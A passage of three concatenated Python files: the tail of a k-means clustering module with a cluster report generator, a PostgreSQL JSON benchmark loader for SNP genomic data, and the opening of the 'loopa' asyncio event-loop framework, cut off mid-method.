    seed : optional int for reproducible draws

    Returns a (k, n_features) array of k distinct rows of ``data``.
    Raises ValueError (from numpy) if k exceeds the number of rows.
    """
    if seed is not None:  # useful for obtaining consistent results
        np.random.seed(seed)
    n = data.shape[0]  # number of data points
    # Pick K indices from range [0, N) WITHOUT replacement: the previous
    # randint-based draw could select the same row twice, seeding k-means
    # with duplicate centroids and producing empty clusters (NaN means).
    rand_indices = np.random.choice(n, k, replace=False)
    # Keep centroids as dense format, as many entries will be nonzero due
    # to averaging.
    centroids = data[rand_indices, :]
    return centroids
def centroid_pairwise_dist(X, centroids):
    """Return the (n_samples, k) matrix of Euclidean distances from each
    row of ``X`` to each centroid."""
    return pairwise_distances(X, centroids, metric="euclidean")
def assign_clusters(data, centroids):
    """Assign every data point to the index of its nearest centroid."""
    # Distance matrix: rows are data points, columns are centroids.
    dist_matrix = centroid_pairwise_dist(data, centroids)
    # The column index of the smallest distance is the cluster label.
    return np.argmin(dist_matrix, axis=1)
def revise_centroids(data, k, cluster_assignment):
    """Recompute each cluster's centroid as the mean of its members."""
    # For every cluster index, average the rows currently assigned to it.
    return np.array([data[cluster_assignment == cluster].mean(axis=0)
                     for cluster in range(k)])
def compute_heterogeneity(data, k, centroids, cluster_assignment):
    """Sum of squared Euclidean distances of points to their centroids."""
    total = 0.0
    for cluster in range(k):
        # Rows currently assigned to this cluster.
        members = data[cluster_assignment == cluster, :]
        if members.shape[0] == 0:  # empty clusters contribute nothing
            continue
        distances = pairwise_distances(
            members, [centroids[cluster]], metric="euclidean"
        )
        total += np.sum(distances**2)
    return total
def plot_heterogeneity(heterogeneity, k):
    """Plot the heterogeneity (loss) recorded per k-means iteration."""
    plt.figure(figsize=(7, 4))
    plt.plot(heterogeneity, linewidth=4)
    plt.xlabel("# Iterations")
    plt.ylabel("Heterogeneity")
    plt.title(f"Heterogeneity of clustering over time, K={k:d}")
    # NOTE(review): rcParams is updated after the artists are created;
    # some settings may only affect later figures — confirm intent.
    plt.rcParams.update({"font.size": 16})
    plt.show()
def kmeans(
    data, k, initial_centroids, maxiter=500, record_heterogeneity=None, verbose=False
):
    """This function runs k-means on given data and initial set of centroids.

    maxiter: maximum number of iterations to run.(default=500)
    record_heterogeneity: (optional) a list, to store the history of heterogeneity
                          as function of iterations
                          if None, do not store the history.
    verbose: if True, print how many data points changed their cluster labels in
             each iteration

    Returns the final ``(centroids, cluster_assignment)`` pair.
    NOTE(review): assumes maxiter >= 1; with maxiter=0 the loop never runs
    and ``cluster_assignment`` is unbound — confirm callers never pass 0.
    """
    centroids = initial_centroids[:]
    prev_cluster_assignment = None
    for itr in range(maxiter):
        if verbose:
            print(itr, end="")
        # 1. Make cluster assignments using nearest centroids
        cluster_assignment = assign_clusters(data, centroids)
        # 2. Compute a new centroid for each of the k clusters, averaging all data
        # points assigned to that cluster.
        centroids = revise_centroids(data, k, cluster_assignment)
        # Check for convergence: if none of the assignments changed, stop
        # (the converged iteration's heterogeneity is NOT recorded).
        if (
            prev_cluster_assignment is not None
            and (prev_cluster_assignment == cluster_assignment).all()
        ):
            break
        # Print number of new assignments
        if prev_cluster_assignment is not None:
            num_changed = np.sum(prev_cluster_assignment != cluster_assignment)
            if verbose:
                print(
                    " {:5d} elements changed their cluster assignment.".format(
                        num_changed
                    )
                )
        # Record heterogeneity convergence metric
        if record_heterogeneity is not None:
            # YOUR CODE HERE
            score = compute_heterogeneity(data, k, centroids, cluster_assignment)
            record_heterogeneity.append(score)
        # Keep a copy for the next iteration's convergence test.
        prev_cluster_assignment = cluster_assignment[:]
    return centroids, cluster_assignment
# Mock test below
# Manual smoke test: clusters the iris data set and plots the loss curve.
# Deliberately dead code; flip the condition to run it interactively.
if False:  # change to true to run this test case.
    from sklearn import datasets as ds

    dataset = ds.load_iris()
    k = 3
    heterogeneity = []
    initial_centroids = get_initial_centroids(dataset["data"], k, seed=0)
    centroids, cluster_assignment = kmeans(
        dataset["data"],
        k,
        initial_centroids,
        maxiter=400,
        record_heterogeneity=heterogeneity,
        verbose=True,
    )
    plot_heterogeneity(heterogeneity, k)
def ReportGenerator(
df: pd.DataFrame, ClusteringVariables: np.ndarray, FillMissingReport=None
) -> pd.DataFrame:
"""
Function generates an easy-reading clustering report. It takes 2 arguments as an input:
DataFrame - dataframe with predicted cluester column;
FillMissingReport - dictionary of rules how we are going to fill missing
values of for final report generate (not included in modeling);
in order to run the function following libraries must be imported:
import pandas as pd
import numpy as np
>>> data = pd.DataFrame()
>>> data['numbers'] = [1, 2, 3]
>>> data['col1'] = [0.5, 2.5, 4.5]
>>> data['col2'] = [100, 200, 300]
>>> data['col3'] = [10, 20, 30]
>>> data['Cluster'] = [1, 1, 2]
>>> ReportGenerator(data, ['col1', 'col2'], 0)
Features Type Mark 1 2
0 # of Customers ClusterSize False 2.000000 1.000000
1 % of Customers ClusterProportion False 0.666667 0.333333
2 col1 mean_with_zeros True 1.500000 4.500000
3 col2 mean_with_zeros True 150.000000 300.000000
4 numbers mean_with_zeros False 1.500000 3.000000
.. ... ... ... ... ...
99 dummy 5% False 1.000000 1.000000
100 dummy 95% False 1.000000 1.000000
101 dummy stdev False 0.000000 NaN
102 dummy mode False 1.000000 1.000000
103 dummy median False 1.000000 1.000000
<BLANKLINE>
[104 rows x 5 columns]
"""
# Fill missing values with given rules
if FillMissingReport:
df.fillna(value=FillMissingReport, inplace=True)
df["dummy"] = 1
numeric_cols = df.select_dtypes(np.number).columns
report = (
df.groupby(["Cluster"])[ # construct report dataframe
numeric_cols
] # group by cluster number
.agg(
[
("sum", np.sum),
("mean_with_zeros", lambda x: np.mean(np.nan_to_num(x))),
("mean_without_zeros", lambda x: x.replace(0, np.NaN).mean()),
(
"mean_25-75",
lambda x: np.mean(
np.nan_to_num(
sorted(x)[
round(len(x) * 25 / 100) : round(len(x) * 75 / 100)
]
)
),
),
("mean_with_na", np.mean),
("min", lambda x: x.min()),
("5%", lambda x: x.quantile(0.05)),
("25%", lambda x: x.quantile(0.25)),
("50%", lambda x: x.quantile(0.50)),
("75%", lambda x: x.quantile(0.75)),
("95%", lambda x: x.quantile(0.95)),
("max", lambda x: x.max()),
("count", lambda x: x.count()),
("stdev", lambda x: x.std()),
("mode", lambda x: x.mode()[0]),
("median", lambda x: x.median()),
("# > 0", lambda x: (x > 0).sum()),
]
)
.T.reset_index()
.rename(index=str, columns={"level_0": "Features", "level_1": "Type"})
) # rename columns
# calculate the size of cluster(count of clientID's)
clustersize = report[
(report["Features"] == "dummy") & (report["Type"] == "count")
].copy() # avoid SettingWithCopyWarning
clustersize.Type = (
"ClusterSize" # rename created cluster df to match report column names
)
clustersize.Features = "# of Customers"
clusterproportion = pd.DataFrame(
clustersize.iloc[:, 2:].values
/ clustersize.iloc[:, 2:].values.sum() # calculating the proportion of cluster
)
clusterproportion[
"Type"
] = "% of Customers" # rename created cluster df to match report column names
clusterproportion["Features"] = "ClusterProportion"
cols = clusterproportion.columns.tolist()
cols = cols[-2:] + cols[:-2]
clusterproportion = clusterproportion[cols] # rearrange columns to match report
clusterproportion.columns = report.columns
a = pd.DataFrame(
abs(
report[report["Type"] == "count"].iloc[:, 2:].values
- clustersize.iloc[:, 2:].values
)
) # generating df with count of nan values
a["Features"] = 0
a["Type"] = "# of nan"
a.Features = report[
report["Type"] == "count"
].Features.tolist() # filling values in order to match report
cols = a.columns.tolist()
cols = cols[-2:] + cols[:-2]
a = a[cols] # rearrange columns to match report
a.columns = report.columns # rename columns to match report
report = report.drop(
report[report.Type == "count"].index
) # drop count values except cluster size
report = pd.concat(
[report, a, clustersize, clusterproportion], axis=0
) # concat report with clustert size and nan values
report["Mark"] = report["Features"].isin(ClusteringVariables)
cols = report.columns.tolist()
cols = cols[0:2] + cols[-1:] + cols[2:-1]
report = report[cols]
sorter1 = {
"ClusterSize": 9,
"ClusterProportion": 8,
"mean_with_zeros": 7,
"mean_with_na": 6,
"max": 5,
"50%": 4,
"min": 3,
"25%": 2,
"75%": 1,
"# of nan": 0,
"# > 0": -1,
"sum_with_na": -2,
}
report = (
report.assign(
Sorter1=lambda x: x.Type.map(sorter1),
Sorter2=lambda x: list(reversed(range(len(x)))),
)
.sort_values(["Sorter1", "Mark", "Sorter2"], ascending=False)
.drop(["Sorter1", "Sorter2"], axis=1)
)
report.columns.name = ""
report = report.reset_index()
report.drop(columns=["index"], inplace=True)
return report
# Run this module's doctests (e.g. the ReportGenerator example) when the
# file is executed directly; silent on success.
if __name__ == "__main__":
    import doctest
    doctest.testmod()
| |
import argparse
import csv
import json
import os
import sys
import time

import psycopg2  # psycopg2 v2.5.1

sys.path.append('../modules')
from result import Result
# Command-line interface: all options are optional; unset ones fall back to
# the defaults assigned further below.
arg_parser = argparse.ArgumentParser(description='Load SNP and locus data')
arg_parser.add_argument('--dev', action='store_true', help='Only load chromosome 21 for development testing')
arg_parser.add_argument('--db', type=str, help='Postgres database name')
arg_parser.add_argument('--username', type=str, help='Postgres username')
arg_parser.add_argument('--password', type=str, help='Postgres password')
arg_parser.add_argument('--jsonb', action='store_true', help='Use pgsql binary json type')
arg_parser.add_argument('--pgcopy', action='store_true', help='Load data from file with COPY method')
arg_parser.add_argument('--tag', type=str, help='Tag to place in results file')
arg_parser.add_argument('--path', help='Path to chromosome data')
arg_parser.add_argument('--start', type=str, help='Chromosome to start load from')
arg_parser.add_argument('--indexes', action='store_true', help='Create indexes')
arg_parser.add_argument('--queries', action='store_true', help='Run queries')
args = arg_parser.parse_args()
# Set script version (written as the first line of the results file)
scriptVersion = "2.0"

# Default configuration; each value may be overridden from the CLI below.
dev = False
pgcopy = False
createIndexes = False
runQueries = False
databaseName = 'snp_research'
username = 'dev'
password = ''
path = ''
tag = ''
start = '1'
jsonb = False

# Update any present from CLI
if args.dev:  # If dev mode, only load chr 21
    dev = True
if args.path is not None:  # If set, use as root path for chromosome data
    path = args.path
if args.db is not None:  # If set, use as database name for Postgres
    databaseName = args.db
if args.username is not None:  # Postgres username
    username = args.username
if args.password is not None:  # Postgres password
    password = args.password
if args.jsonb:
    jsonb = True
# BUG FIX: store_true options are always True/False, never None, so the old
# `is not None` guards on pgcopy/indexes/queries were always true. Test the
# flags directly, consistent with --dev and --jsonb above (same behavior,
# honest conditions).
if args.pgcopy:
    pgcopy = True
if args.tag is not None:  # Tag to place in results file
    tag = args.tag
if args.start is not None:
    start = args.start
if args.indexes:
    createIndexes = True
if args.queries:
    runQueries = True
# Open results file; embed the optional run tag in the filename so runs with
# different tags do not clobber each other.
resultsFileName = 'results-pgsql-json'
if tag != "":
    # BUG FIX: the original tested `resultsFileName != ""`, which is always
    # true (it was assigned one line above) and produced names like
    # "results-pgsql-json-.txt" when no tag was supplied. Only append the
    # separator when a tag is actually present.
    resultsFileName += '-' + tag
resultsFileName += '.txt'
resultsFile = open(resultsFileName, 'w')
resultsFile.write(scriptVersion + '\n')
# Write the column header row for the per-chromosome result lines.
result = Result()
resultsFile.write(result.toHeader() + '\n')
# Per-chromosome input file name templates ({0} is the chromosome name)
snpFilePath = 'snpData-chr{0}.txt'
lociFilePath = 'lociData-chr{0}.txt'

# Chromosomes to load: just 21 in dev mode, otherwise the full set, in
# canonical order.
chromosomes = ["21"]  # dev list
if dev is False:
    chromosomes = ["1","2","3","4","5","6","7","8","9","10","11","12","13","14","15","16","17","18","19","20","21","22","X","Y","MT"]  # complete list

# Allow restarting a partial load from anywhere in the list: keep `start`
# and everything after it, in the order above (empty when `start` is not a
# known chromosome, matching the original flag-scan behavior).
if start != "1":
    if start in chromosomes:
        chromosomes = chromosomes[chromosomes.index(start):]
    else:
        chromosomes = []
# Create Postgres database, tables if not exists
# For initial connection, connect to user database and then create the experimental db
postgresConnection = psycopg2.connect("dbname=" + username + " user=" + username)
postgresConnection.autocommit = True
createDbCursor = postgresConnection.cursor()
# BUG FIX: add IF EXISTS -- a bare DROP DATABASE aborts the whole run when
# the database does not exist yet (e.g. the first execution on a fresh host).
createDbCursor.execute("DROP DATABASE IF EXISTS " + databaseName)
# NOTE(review): identifiers cannot be bound as query parameters, so the name
# is concatenated into the DDL; acceptable for a local benchmark script, but
# never expose databaseName to untrusted input.
createDbCursor.execute("CREATE DATABASE " + databaseName)
createDbCursor.close()
postgresConnection.close()  # Reconnect with database name

# Reopen connection to the experimental database to create tables and begin inserts
postgresConnection = psycopg2.connect("dbname=" + databaseName + " user=" + username)
createDbCursor = postgresConnection.cursor()

# Single-table schema: one serial key plus the whole SNP document as
# json/jsonb, selected by the --jsonb flag.
TABLES = {}
if jsonb:
    TABLES['snp'] = (
        "CREATE TABLE IF NOT EXISTS snp ("
        " id serial PRIMARY KEY,"
        " jsondata jsonb"
        ");")
else:
    TABLES['snp'] = (
        "CREATE TABLE IF NOT EXISTS snp ("
        " id serial PRIMARY KEY,"
        " jsondata json"
        ");")

# items() instead of the Python-2-only iteritems(); behaves identically on
# both interpreters for this small dict.
for name, ddl in TABLES.items():
    createDbCursor.execute(ddl)
postgresConnection.commit()

# Disable triggers/constraints on tables to speed up the bulk load;
# re-enabled after all chromosomes are inserted.
createDbCursor.execute("ALTER TABLE snp DISABLE trigger ALL;")
createDbCursor.close()
# Dictionaries and arrays for SQL and MongoDB queries
# (NB: this script is Python 2 -- print statements, dict.iteritems below.)
documents = {} # Dictionary for MongoDB SNP/loci documents
# Main load loop: for each chromosome, read the SNP and loci TSV files into
# `documents`, then insert each document as one JSON row in the snp table,
# timing every phase into a Result record.
for curChr in chromosomes:
    result = Result()
    result.method = "pgsql-json"
    if jsonb:
        result.method = "pgsql-jsonb"
    result.tag = tag
    print "Chromosome " + str(curChr)
    result.chromosome = str(curChr)
    # Set file paths for current chromosome
    curSnpFilePath = snpFilePath.format(curChr)
    curLociFilePath = lociFilePath.format(curChr)
    if len(path) > 0:
        # NOTE(review): joins with a literal backslash separator, yet the
        # COPY temp path below is POSIX (/home/ec2-user) -- this only works
        # when --path is unset or Windows-style; os.path.join would be
        # portable. Confirm the intended platform.
        curSnpFilePath = path.rstrip('\\').rstrip('/') + '\\' + curSnpFilePath
        curLociFilePath = path.rstrip('\\').rstrip('/') + '\\' + curLociFilePath
    # Reuse one dict across chromosomes; drop the previous chromosome's docs.
    documents.clear()
    print "Chromosome " + str(curChr) + ". Reading SNP Data"
    result.snpLoadStart = time.time()
    sys.stdout.flush()
    # Read in data from SNP file: rsid, chromosome, clinical-significance
    # flag (anything other than '' or 'false' counts as significant).
    with open(curSnpFilePath,'r') as csvfile:
        data = csv.reader(csvfile,delimiter='\t')
        for row in data:
            if(len(row) == 3):
                hasSig = False
                if row[2] != '' and row[2] != 'false':
                    hasSig = True
                documents[row[0]] = {"rsid":row[0], "chr":row[1], "has_sig":hasSig, "loci":[]}
    result.snpLoadEnd = time.time()
    print "Chromosome " + str(curChr) + ". Reading loci Data."
    result.lociLoadStart = time.time()
    # Now that we have primary keys for each SNP, read in loci data
    # (rows for unknown rsids are silently skipped).
    with open(curLociFilePath,'r') as csvfile:
        data = csv.reader(csvfile,delimiter='\t')
        for row in data:
            if(len(row) == 4 and row[0] in documents):
                # Load loci in Mongo documents
                curDoc = documents[row[0]]
                # NOTE(review): "loci" is always initialized to [] above, so
                # this None branch appears to be dead code.
                if curDoc["loci"] is None:
                    curDoc["loci"] = [{"mrna_acc":row[1],"gene":row[2],"class":row[3]}]
                else:
                    curDoc["loci"].append({"mrna_acc":row[1],"gene":row[2],"class":row[3]})
                documents[row[0]] = curDoc
    cursor = postgresConnection.cursor()
    # Data for reporting
    result.lociLoadEnd = time.time()
    result.totalDocuments = len(documents)
    print "Starting to insert " + str(result.totalDocuments) + " documents"
    sys.stdout.flush()
    # Log start time for MongoDB inserts
    result.documentInsertStart = time.time()
    if pgcopy:
        # Bulk path: dump every document as one JSON line, then bulk-load
        # with COPY. NOTE(review): COPY ... FROM 'file' reads a path on the
        # *server* filesystem, so this assumes the script runs on the DB host.
        mimpfile = "/home/ec2-user/jsonchr" + str(curChr) + ".json"
        print "Writing json file for copy"
        sys.stdout.flush()
        fp = open(mimpfile,'w')
        for curDoc in documents.values():
            json.dump(curDoc,fp)
            fp.write('\n')
        fp.close()
        print "Loading json with copy method"
        sys.stdout.flush()
        # Restart insert time so only the COPY itself is measured.
        result.documentInsertStart = time.time()
        cursor.execute("COPY snp (jsondata) FROM '" + mimpfile + "'")
        os.remove(mimpfile)
    else:
        print "Individual document inserting starting"
        sys.stdout.flush()
        # Slow path: one parameterized INSERT per document (v is a
        # (key, document) pair from iteritems, hence v[1]).
        for v in documents.iteritems():
            cursor.execute("insert into snp (jsondata) values (%s)", [json.dumps(v[1])])
    # Commit data to pgsql
    postgresConnection.commit()
    # Log end time and total pgsql time
    result.documentInsertEnd = time.time()
    result.calculate()
    # Close pgsql cursor
    cursor.close()
    print result.toTerm()
    resultsFile.write(result.toString() + '\n')
    sys.stdout.flush()
# Create new cursor, create indexes and run test queries
cursor = postgresConnection.cursor()
print "Turning on key checks..."
# Re-enable the triggers/constraints disabled before the bulk load.
cursor.execute("ALTER TABLE snp ENABLE trigger ALL;")
if createIndexes:
    # Time the creation of each index and record it as one result row.
    result = Result()
    result.method = "pgsql-jsonIdx"
    result.tag = tag
    # NOTE(review): GIN indexes over jsondata expressions require the jsonb
    # operator classes -- these statements presumably fail when the table was
    # created with the plain json type (no --jsonb); confirm.
    rsidIndex = "CREATE INDEX idx_rsid ON snp USING GIN ((jsondata -> 'rsid'))"
    clinIndex = "CREATE INDEX idx_clin ON snp USING GIN ((jsondata -> 'has_sig'))"
    geneIndex = "CREATE INDEX idx_gene ON snp USING GIN ((jsondata -> 'loci') jsonb_path_ops)"
    fullIndex = "CREATE INDEX idx_full ON snp USING GIN ((jsondata) jsonb_path_ops)"
    print "Creating RSID index..."
    sys.stdout.flush()
    idxStart = time.time()
    cursor.execute(rsidIndex)
    postgresConnection.commit()
    idxEnd = time.time()
    result.idxRsid = idxEnd - idxStart
    print "Creating ClinSig index..."
    sys.stdout.flush()
    idxStart = time.time()
    cursor.execute(clinIndex)
    postgresConnection.commit()
    idxEnd = time.time()
    result.idxClinSig = idxEnd - idxStart
    print "Creating Gene index..."
    sys.stdout.flush()
    idxStart = time.time()
    cursor.execute(geneIndex)
    postgresConnection.commit()
    idxEnd = time.time()
    result.idxGene = idxEnd - idxStart
    print "Creating full GIN index..."
    sys.stdout.flush()
    idxStart = time.time()
    cursor.execute(fullIndex)
    postgresConnection.commit()
    idxEnd = time.time()
    # NOTE(review): unlike the three timings above, the full-index duration is
    # only printed, never stored on `result`, so it is missing from the
    # results file -- confirm whether that is intentional.
    print "Full GIN Index: " + str(idxEnd-idxStart)
    resultsFile.write(result.toString() + '\n')
    sys.stdout.flush()
# Query benchmark: run the four containment queries ten times, recording the
# wall-clock duration of each as its own result row.
if runQueries:
    for z in range(1,11):
        result = Result()
        result.method = "pgsql-jsonQry" + str(z)
        result.tag = tag
        print "Running queries, count " + str(z)
        sys.stdout.flush()
        # Lookup by rsid via top-level containment.
        idxStart = time.time()
        cursor.execute('SELECT * FROM snp WHERE jsondata @> \'{"rsid" : "rs8788"}\'')
        idxEnd = time.time()
        result.qryByRsid = idxEnd - idxStart
        # Count clinically-significant SNPs.
        idxStart = time.time()
        cursor.execute('SELECT count(*) FROM snp WHERE jsondata @> \'{"has_sig":true}\'')
        idxEnd = time.time()
        result.qryByClinSig = idxEnd - idxStart
        # Count SNPs with a locus on a given gene (array containment).
        idxStart = time.time()
        cursor.execute('SELECT count(*) FROM snp WHERE jsondata->\'loci\' @> \'[{"gene":"GRIN2B"}]\'')
        idxEnd = time.time()
        result.qryByGene = idxEnd - idxStart
        # NOTE(review): this one matches on the key "loci.gene", unlike the
        # "gene" key used just above; loci elements are written with "gene",
        # so this containment presumably never matches -- confirm intent.
        idxStart = time.time()
        cursor.execute('SELECT count(*) FROM snp WHERE jsondata->\'loci\' @> \'[{"loci.gene":"GRIN2B"}]\' AND jsondata @> \'{"has_sig":true}\'')
        idxEnd = time.time()
        result.qryByGeneSig = idxEnd - idxStart
        resultsFile.write(result.toString() + '\n')
# Close pgsql cursor
cursor.close()
resultsFile.close()
postgresConnection.close()
print "Run complete."
| |
'''
LICENSING
-------------------------------------------------
loopa: Arduino-esque event loop app framework, and other utilities.
Copyright (C) 2016 Muterra, Inc.
Contributors
------------
Nick Badger
badg@muterra.io | badg@nickbadger.com | nickbadger.com
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.,
51 Franklin Street,
Fifth Floor,
Boston, MA 02110-1301 USA
------------------------------------------------------
'''
# External deps
import logging
import asyncio
import threading
import weakref
import traceback
import collections
import inspect
# In-package deps
from .utils import await_coroutine_threadsafe
# from .exceptions import LoopaException
# ###############################################
# Boilerplate
# ###############################################
# Control * imports.
# Public API of this module.
# NOTE(review): 'Aengel' is defined later in this file; 'NoopLoop' is not
# visible in this chunk -- confirm it exists at import time.
__all__ = [
    'ManagedTask',
    'TaskLooper',
    'TaskCommander',
    'Aengel',
    'NoopLoop'
]

# Module-level logger, named after the module per logging convention.
logger = logging.getLogger(__name__)
# ###############################################
# Etc
# ###############################################
# Bundles the positional and keyword arguments a registered task should be
# started with (see TaskCommander._insert_task).
_TaskDef = collections.namedtuple('_TaskDef', ('args', 'kwargs'))
class _ThreadHelper(threading.Thread):
    ''' Thread subclass whose target (and its args/kwargs) can be
    supplied after construction, just before start().
    '''
    # Signature of threading.Thread's constructor; ManagedTask binds
    # against this to fail fast on bad thread arguments.
    ARGSIG = inspect.Signature.from_callable(threading.Thread)

    def __init__(self, *args, **kwargs):
        ''' Construct the thread normally; the real target is recorded
        later via set_target().
        '''
        super().__init__(*args, **kwargs)
        self.__deferred_target = None
        self.__deferred_args = None
        self.__deferred_kwargs = None

    def set_target(self, target, args, kwargs):
        ''' Record the callable to invoke in run(), together with the
        args and kwargs it should receive. Lets ManagedTask.start() pass
        its own arguments through to the target.
        '''
        self.__deferred_target = target
        self.__deferred_args = args
        self.__deferred_kwargs = kwargs

    def run(self):
        ''' Invoke the deferred target, handing it the recorded args and
        kwargs as two positional parameters (matching the
        ManagedTask._run(args, kwargs) signature).
        '''
        self.__deferred_target(self.__deferred_args, self.__deferred_kwargs)
# ###############################################
# Lib
# ###############################################
class ManagedTask:
    ''' Manages thread shutdown (etc) for a thread whose sole purpose is
    running an event loop.
    '''

    def __init__(self, *args, threaded=False, debug=False, aengel=None,
                 reusable_loop=False, start_timeout=None, thread_args=tuple(),
                 thread_kwargs={}, **kwargs):
        ''' Creates a ManagedTask.
        *args and **kwargs will be passed to the threading.Thread
        constructor iff threaded=True. Otherwise, they will be ignored.
        Loop init arguments should be passed through the start() method.
        if executor is None, defaults to the normal executor.
        if reusable_loop=True, the ManagedTask can be run more than
        once, but you're responsible for manually calling finalize() to
        clean up the loop. Except this doesn't work at the moment,
        because the internal thread is not reusable.
        '''
        # NOTE(review): thread_kwargs={} is a mutable default argument; it is
        # only read below (never mutated), so this is benign, but a None
        # sentinel would be safer.
        super().__init__(*args, **kwargs)
        if aengel is not None:
            # Register with the aengel so we get stopped when the main
            # thread exits.
            aengel.prepend_guardling(self)
        self._debug = bool(debug)
        self.reusable_loop = bool(reusable_loop)
        # How long start() blocks waiting for the threaded loop to come up.
        self._start_timeout = start_timeout
        # This is our actual asyncio.Task
        self._task = None
        # These flags control blocking when threaded
        self._startup_complete_flag = threading.Event()
        self._shutdown_complete_flag = threading.Event()
        # And deal with threading
        if threaded:
            self.threaded = True
            # Threaded mode owns a dedicated loop, installed into the worker
            # thread inside _run().
            self._loop = asyncio.new_event_loop()
            # Save args and kwargs for the thread creation
            self._thread_args = thread_args
            self._thread_kwargs = thread_kwargs
            # Do this here so we can fail fast, instead of when calling start
            # Set up a thread for the loop
            try:
                # Dry-run bind against threading.Thread's signature to
                # surface bad thread args now rather than at start().
                _ThreadHelper.ARGSIG.bind(
                    *thread_args,
                    daemon = False,
                    target = None,
                    args = tuple(),
                    kwargs = {},
                    **thread_kwargs
                )
            except TypeError as exc:
                raise TypeError(
                    'Improper *args and/or **kwargs for threaded ' +
                    'ManagedTask: ' + str(exc)
                ) from None
        else:
            self.threaded = False
            # Non-threaded mode reuses the caller's current event loop.
            self._loop = asyncio.get_event_loop()
        # Declare the thread as nothing.
        self._thread = None
        # This controls blocking for async stuff on exit
        # NOTE(review): the loop= argument to asyncio.Event was deprecated in
        # Python 3.8 and removed in 3.10 -- confirm the supported interpreter
        # range for this library.
        self._exiting_task = asyncio.Event(loop=self._loop)

    def start(self, *args, **kwargs):
        ''' Dispatches start() to self._start() or self._thread.start(),
        as appropriate. Passes *args and **kwargs along to the task_run
        method.
        '''
        if self.threaded:
            # Delay thread generation until starting.
            self._thread = _ThreadHelper(
                daemon = False,
                target = None,
                args = tuple(),
                kwargs = {},
                *self._thread_args,
                **self._thread_kwargs
            )
            # Update the thread's target and stuff and then run it
            self._thread.set_target(self._run, args, kwargs)
            self._thread.start()
            # Block the caller until the loop reports startup (or the
            # configured timeout elapses).
            self._startup_complete_flag.wait(timeout=self._start_timeout)
        else:
            # This is redundant, but do it anyways in case other code changes
            self._thread = None
            # Synchronous path: run the loop in the calling thread; this
            # blocks until the task completes.
            self._run(args, kwargs)

    def _run(self, args, kwargs):
        ''' Handles everything needed to start the loop within the
        current context/thread/whatever. May be extended, but MUST be
        called via super().
        '''
        self._loop.set_debug(self._debug)
        self._shutdown_complete_flag.clear()
        try:
            try:
                # If we're running in a thread, we MUST explicitly set up the
                # event loop
                if self.threaded:
                    asyncio.set_event_loop(self._loop)
                # Start the task.
                self._looper_future = asyncio.ensure_future(
                    self._execute_task(args, kwargs)
                )
                # Note that this will automatically return the future's result
                # (or raise its exception). We don't use the result, so...
                self._loop.run_until_complete(self._looper_future)
            finally:
                # Just in case we're reusable, reset the _thread so start()
                # generates a new one on next call.
                self._thread = None
                if not self.reusable_loop:
                    self.finalize()
        # Careful: stop_threadsafe could be waiting on shutdown_complete.
        # Give these an extra layer of protection so that the close() caller
        # can always return, even if closing the loop errored for some reason
        finally:
            # Only bother doing this if being called directly (not from within
            # a parent commander)
            self._exiting_task = None
            self._startup_complete_flag.clear()
            self._shutdown_complete_flag.set()

    def stop(self):
        ''' ONLY TO BE CALLED FROM WITHIN OUR RUNNING TASKS! Do NOT call
        this wrapped in a call_coroutine_threadsafe or
        run_coroutine_loopsafe; instead use the direct methods.
        Always returns immediately and cannot wait for closure of the
        loop (chicken vs egg).
        '''
        if not self._startup_complete_flag.is_set():
            raise RuntimeError('Cannot stop before startup is complete.')
        logger.debug('Cancelling task via stop: ' + repr(self))
        # Cancellation propagates into task_run via the await inside
        # _execute_task.
        self._task.cancel()

    def stop_threadsafe_nowait(self):
        ''' Stops us from within a different thread without waiting for
        closure.
        '''
        if self._loop.is_running():
            self._loop.call_soon_threadsafe(self.stop)
        else:
            # Loop already stopped: just unblock any stop_threadsafe waiters.
            self._shutdown_complete_flag.set()

    def stop_threadsafe(self, timeout=None):
        ''' Stops us from within a different thread.
        '''
        self.stop_threadsafe_nowait()
        # Block until _run()'s finally clause signals shutdown (or timeout).
        self._shutdown_complete_flag.wait(timeout=timeout)

    async def task_run(self):
        ''' Serves as a landing point for coop multi-inheritance.
        Override this to actually do something.
        '''
        pass

    async def _execute_task(self, args, kwargs):
        ''' Actually executes the task at hand.
        '''
        try:
            try:
                self._task = asyncio.ensure_future(
                    self.task_run(*args, **kwargs)
                )
            finally:
                # Don't wait to set the startup flag until we return control to
                # the loop, because we already "started" the tasks.
                self._startup_complete_flag.set()
            # Raise the task's exception or return its result. More likely
            # than not, this will only happen if the worker finishes first.
            # asyncio handles raising the exception for us here.
            try:
                result = await asyncio.wait_for(self._task, timeout=None)
            except asyncio.CancelledError:
                logger.debug('Cancelling task: ' + repr(self))
                self._task.cancel()
                result = None
            return result
        # Reset the termination flag on the way out, just in case.
        # NOTE THAT WE MAY HAVE THINGS WAITING FOR US TO EXIT, but that the
        # loop itself will stop running when this coro completes! So we need
        # to wait for any waiters to clear.
        finally:
            self._exiting_task.set()
            self._task = None

    def _abort(self):
        ''' Performs any needed cancellation propagation (etc).
        Must only be called from within the event loop.
        '''
        pass

    def finalize(self):
        ''' Close the event loop and perform any other necessary
        ManagedTask cleanup. Task cleanup should be handled within the
        task.
        '''
        self._loop.close()
class TaskLooper(ManagedTask):
    ''' Basically, the Arduino of event loops. Can be invoked directly
    for a single-purpose app loop, or can be added to a LoopaCommanda to
    enable multiple simultaneous app loops.
    Requires subclasses to define an async loop_init function and a
    loop_run function. Loop_run is handled within a "while running"
    construct.
    Optionally, async def loop_stop may be defined for cleanup.
    '''

    def __init__(self, *args, **kwargs):
        ''' Add a loop_init event to self.
        '''
        super().__init__(*args, **kwargs)
        # Use the explicit loop! We may be in a different thread than the
        # eventual start() call.
        # NOTE(review): loop= was removed from asyncio.Event in Python 3.10;
        # confirm the supported interpreter range.
        self._init_complete = asyncio.Event(loop=self._loop)

    async def loop_init(self):
        ''' Endpoint for cooperative multiple inheritance.
        '''
        pass

    async def loop_run(self):
        ''' Endpoint for cooperative multiple inheritance.
        '''
        pass

    async def loop_stop(self):
        ''' Endpoint for cooperative multiple inheritance.
        '''
        pass

    async def task_run(self, *args, **kwargs):
        ''' Wraps up all of the loop stuff: loop_init once, loop_run
        repeatedly until cancelled, then loop_stop exactly once.
        '''
        try:
            logger.debug('Loop init starting: ' + repr(self))
